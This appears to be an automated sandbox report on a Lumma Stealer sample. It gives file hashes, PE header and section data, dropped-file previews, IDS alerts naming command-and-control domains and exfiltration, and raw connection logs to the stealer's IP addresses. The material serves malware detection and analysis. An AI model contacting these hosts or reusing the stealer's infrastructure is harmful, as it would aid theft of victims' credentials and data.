                                                                                                                                                                                                                                          SHA-256:10E38243BC939E689A79F366DC5342D3161DFD7FD6460F296E73094ED22CB57E
                                                                                                                                                                                                                                          SHA-512:847108D7EEDCF07A025CD68E0B48A640CABE9791E95EF6A1953FD38DC24B9C20DA3FB38715EF8B91166C46605DE248511C1686DB70EFDC7B109419D433FED552
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.4.0.8.<./.P.i.
                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):4683
                                                                                                                                                                                                                                          Entropy (8bit):4.4603757606159204
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:48:cvIwWl8zsHJg77aI9QkUUSWpW8VYMYm8M4JhiffEgF58J+q8bitGQR1SaraDwMsy:uIjfpI7ykUa7VwJh6GgCpSaraLsMd
                                                                                                                                                                                                                                          MD5:CD5F85879F79003ED60B1C76733B711F
                                                                                                                                                                                                                                          SHA1:9DD66EFF418BE5EF7E9B52CEE2E883BD24A64B7F
                                                                                                                                                                                                                                          SHA-256:8AE1F6052167AEC019480BD58265022752F742EE8504031266A61EBF18A330CE
                                                                                                                                                                                                                                          SHA-512:83C5CE038C026369A9FB52825FB4EEA335C910B12F70C085BD2A9A14DC6317235EB618BACD221602344A57256A4023B2E794271D6BF200C225C6919CCA28BB76
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="636769" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):42
                                                                                                                                                                                                                                          Entropy (8bit):4.0050635535766075
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:QHXMKa/xwwUy:Q3La/xwQ
                                                                                                                                                                                                                                          MD5:84CFDB4B995B1DBF543B26B86C863ADC
                                                                                                                                                                                                                                          SHA1:D2F47764908BF30036CF8248B9FF5541E2711FA2
                                                                                                                                                                                                                                          SHA-256:D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
                                                                                                                                                                                                                                          SHA-512:485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                          Reputation:high, very likely benign file
                                                                                                                                                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exe
                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):484352
                                                                                                                                                                                                                                          Entropy (8bit):7.079270254749303
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:6144:VmbiqDG2YZiamonYNqSY9h1cflWQ+pGDv6xWXa0ewRs8SODY+CxJUx4x2DHKu+d9:VmhCLiamonRolXb6x8a0BLSODewKue
                                                                                                                                                                                                                                          MD5:8858D2B92C921BBE7126A9048B430BF5
                                                                                                                                                                                                                                          SHA1:AC24CDB9D5B8B4C0135AFDED7FAA31E000929C95
                                                                                                                                                                                                                                          SHA-256:1F761A57FE057D88BECDC441D4AAE37029DDBC1CD808AB2F838DCCE76E869717
                                                                                                                                                                                                                                          SHA-512:FC471CBAA3834C1C3F51C126B3FB7703B42C92B88C4489B9B6D913DD8AE604BF7ED177DA1224B522C0A39C7C1CC671CD2A1C52E04D44E3EBDDD968C970CD996C
                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 66%
                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f...........!...&."...........v.......@............................................@.............................|.......<.......................................................................@............@..L............................text....!.......".................. ..`.rdata...i...@...j...&..............@..@.data....-.......$..................@..../Wm............................... ..`.reloc...............H..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                          File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1835008
                                                                                                                                                                                                                                          Entropy (8bit):4.466387041775699
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:6144:nIXfpi67eLPU9skLmb0b4qWSPKaJG8nAgejZMMhA2gX4WABl0uNMdwBCswSb/:IXD94qWlLZMM6YFHq+/
                                                                                                                                                                                                                                          MD5:AAA395EA52AB4C34644F6AEB3B97D168
                                                                                                                                                                                                                                          SHA1:2CF724802AA09E061148FC340D908B5ABAB40D65
                                                                                                                                                                                                                                          SHA-256:CBD6C411EA054E0C2F64030699FD4010E322C1968EBE5255FE6094C25AFEA261
                                                                                                                                                                                                                                          SHA-512:152C23EF2AA70F1CC4CBBFD2BA95D53CC60E950BF9EF646DAC5D2EC7D906C888963B81E94B51DEF2B332DC6A1F4E750FA1884D0E8A8838DDBF5F0D996E55BAF5
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..[YSQ..............................................................................................................................................................................................................................................................................................................................................O.Lm........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                          File type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                          Entropy (8bit):6.963563761483557
                                                                                                                                                                                                                                          TrID:
                                                                                                                                                                                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                                                                                                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                                                                                          • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                                                                                                          File name:Armanivenntii_crypted_EASY.exe
                                                                                                                                                                                                                                          File size:641'536 bytes
                                                                                                                                                                                                                                          MD5:795197155ca03f53eed7d90a2613d2a7
                                                                                                                                                                                                                                          SHA1:e177b0c729b18f21473df6decd20076a536e4e05
                                                                                                                                                                                                                                          SHA256:9a28b8f494f4f89738766b98f51242ceb5e2207175db7f6682e729451c83fdcf
                                                                                                                                                                                                                                          SHA512:4aff1b1d26b5d3389d8deb0b9b428f4e81daa9d530e37cb3064d33c243407dbf73a218367ba4fa2138b068fc40b5588d5d4ae4849a921ea5e407ad4d3610084b
                                                                                                                                                                                                                                          SSDEEP:12288:jxTG8RXxXVgi53Yq9Nmq0/iCZDmzMTnTVErJAe/xi9Gz4HLrvE8zt6wgRTZOY/gG:jxTH5HNm5/ipzP
                                                                                                                                                                                                                                          TLSH:1ED460DD766072DFC85BC872CEA81D64EB6134BB831B5203A06716EDAA4D897CF141F2
                                                                                                                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f................................. ........@.. ....................... ............@................................
                                                                                                                                                                                                                                          Icon Hash:90cececece8e8eb0
                                                                                                                                                                                                                                          Entrypoint:0x49dbfe
                                                                                                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                                                                                                          Digitally signed:false
                                                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                                                          Subsystem:windows cui
                                                                                                                                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                          Time Stamp:0x66BE9DB1 [Fri Aug 16 00:30:41 2024 UTC]
                                                                                                                                                                                                                                          TLS Callbacks:
                                                                                                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                                                                                                          OS Version Major:4
                                                                                                                                                                                                                                          OS Version Minor:0
                                                                                                                                                                                                                                          File Version Major:4
                                                                                                                                                                                                                                          File Version Minor:0
                                                                                                                                                                                                                                          Subsystem Version Major:4
                                                                                                                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                                                                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                                                                                                                                          Instruction
                                                                                                                                                                                                                                          jmp dword ptr [00402000h]
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x9dbb00x4b.text
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x9e0000x698.rsrc
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xa00000xc.reloc
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                          .text0x20000x9bc040x9be00fd5b6a099c792dc255f68a3556496e8bFalse0.6575014409582999data6.970733999325173IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                          .rsrc0x9e0000x6980x800291712881ed039349b2f8a38cbe41932False0.36181640625data3.655393384230362IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                          .reloc0xa00000xc0x2002761f26c69dcd02d5fddac43c91057fdFalse0.041015625data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                          RT_VERSION0x9e0a00x40cdata0.4189189189189189
                                                                                                                                                                                                                                          RT_MANIFEST0x9e4ac0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041
                                                                                                                                                                                                                                          DLLImport
                                                                                                                                                                                                                                          mscoree.dll_CorExeMain
                                                                                                                                                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                          2024-12-18T14:46:36.278477+01002054790ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (weaknessmznxo .shop)1192.168.2.4520431.1.1.153UDP
                                                                                                                                                                                                                                          2024-12-18T14:46:36.582167+01002055301ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (potentioallykeos .shop)1192.168.2.4540631.1.1.153UDP
                                                                                                                                                                                                                                          2024-12-18T14:46:36.816300+01002055299ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (interactiedovspm .shop)1192.168.2.4499601.1.1.153UDP
                                                                                                                                                                                                                                          2024-12-18T14:46:37.043038+01002055293ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (charecteristicdxp .shop)1192.168.2.4519951.1.1.153UDP
                                                                                                                                                                                                                                          2024-12-18T14:46:37.349272+01002055291ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (cagedwifedsozm .shop)1192.168.2.4514501.1.1.153UDP
                                                                                                                                                                                                                                          2024-12-18T14:46:37.578557+01002055297ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (deicedosmzj .shop)1192.168.2.4629721.1.1.153UDP
                                                                                                                                                                                                                                          2024-12-18T14:46:37.868270+01002055303ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (southedhiscuso .shop)1192.168.2.4613761.1.1.153UDP
                                                                                                                                                                                                                                          2024-12-18T14:46:38.089179+01002055295ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (consciousourwi .shop)1192.168.2.4568371.1.1.153UDP
                                                                                                                                                                                                                                          2024-12-18T14:46:38.319716+01002055307ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (weiggheticulop .shop)1192.168.2.4585711.1.1.153UDP
                                                                                                                                                                                                                                          2024-12-18T14:46:40.141083+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44973123.55.153.106443TCP
                                                                                                                                                                                                                                          2024-12-18T14:46:40.902599+01002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.44973123.55.153.106443TCP
                                                                                                                                                                                                                                          2024-12-18T14:46:42.722528+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449732172.67.157.254443TCP
                                                                                                                                                                                                                                          2024-12-18T14:46:44.969235+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449732172.67.157.254443TCP
                                                                                                                                                                                                                                          2024-12-18T14:46:44.969235+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449732172.67.157.254443TCP
                                                                                                                                                                                                                                          2024-12-18T14:46:46.202441+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449733172.67.157.254443TCP
                                                                                                                                                                                                                                          2024-12-18T14:46:53.381370+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449733172.67.157.254443TCP
                                                                                                                                                                                                                                          2024-12-18T14:46:53.381370+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449733172.67.157.254443TCP
                                                                                                                                                                                                                                          2024-12-18T14:46:54.945532+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449735172.67.157.254443TCP
                                                                                                                                                                                                                                          2024-12-18T14:46:59.011555+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449735172.67.157.254443TCP
                                                                                                                                                                                                                                          2024-12-18T14:47:00.482296+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449740172.67.157.254443TCP
                                                                                                                                                                                                                                          2024-12-18T14:47:05.081834+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449742172.67.157.254443TCP
                                                                                                                                                                                                                                          2024-12-18T14:47:10.368912+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449743172.67.157.254443TCP
                                                                                                                                                                                                                                          2024-12-18T14:47:13.323735+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449744172.67.157.254443TCP
                                                                                                                                                                                                                                          2024-12-18T14:47:16.248484+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449745172.67.157.254443TCP
                                                                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:38.699225903 CET49731443192.168.2.423.55.153.106
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:38.699285030 CET4434973123.55.153.106192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:38.699361086 CET49731443192.168.2.423.55.153.106
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:38.702095985 CET49731443192.168.2.423.55.153.106
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:38.702117920 CET4434973123.55.153.106192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:40.141004086 CET4434973123.55.153.106192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:40.141083002 CET49731443192.168.2.423.55.153.106
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:40.144470930 CET49731443192.168.2.423.55.153.106
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:40.144479036 CET4434973123.55.153.106192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:40.144785881 CET4434973123.55.153.106192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:40.185607910 CET49731443192.168.2.423.55.153.106
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:40.210010052 CET49731443192.168.2.423.55.153.106
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:40.255330086 CET4434973123.55.153.106192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:40.902627945 CET4434973123.55.153.106192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:40.902662039 CET4434973123.55.153.106192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:40.902694941 CET4434973123.55.153.106192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:40.902714968 CET4434973123.55.153.106192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:40.902739048 CET4434973123.55.153.106192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:40.902746916 CET49731443192.168.2.423.55.153.106
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:40.902776957 CET4434973123.55.153.106192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:40.902796984 CET49731443192.168.2.423.55.153.106
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:40.902825117 CET49731443192.168.2.423.55.153.106
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:41.079327106 CET4434973123.55.153.106192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:41.079382896 CET4434973123.55.153.106192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:41.079423904 CET49731443192.168.2.423.55.153.106
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:41.079446077 CET4434973123.55.153.106192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:41.079485893 CET49731443192.168.2.423.55.153.106
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:41.110151052 CET4434973123.55.153.106192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:41.110213995 CET4434973123.55.153.106192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:41.110239029 CET4434973123.55.153.106192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:41.110244036 CET49731443192.168.2.423.55.153.106
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:41.110285044 CET49731443192.168.2.423.55.153.106
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:41.118897915 CET49731443192.168.2.423.55.153.106
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:41.118921041 CET4434973123.55.153.106192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:41.422142029 CET49732443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:41.422184944 CET44349732172.67.157.254192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:41.422252893 CET49732443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:41.422665119 CET49732443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:41.422679901 CET44349732172.67.157.254192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:42.722301006 CET44349732172.67.157.254192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:42.722527981 CET49732443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:42.725071907 CET49732443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:42.725083113 CET44349732172.67.157.254192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:42.725316048 CET44349732172.67.157.254192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:42.726591110 CET49732443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:42.726615906 CET49732443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:42.726646900 CET44349732172.67.157.254192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:44.969191074 CET44349732172.67.157.254192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:44.969279051 CET44349732172.67.157.254192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:44.969355106 CET49732443192.168.2.4172.67.157.254
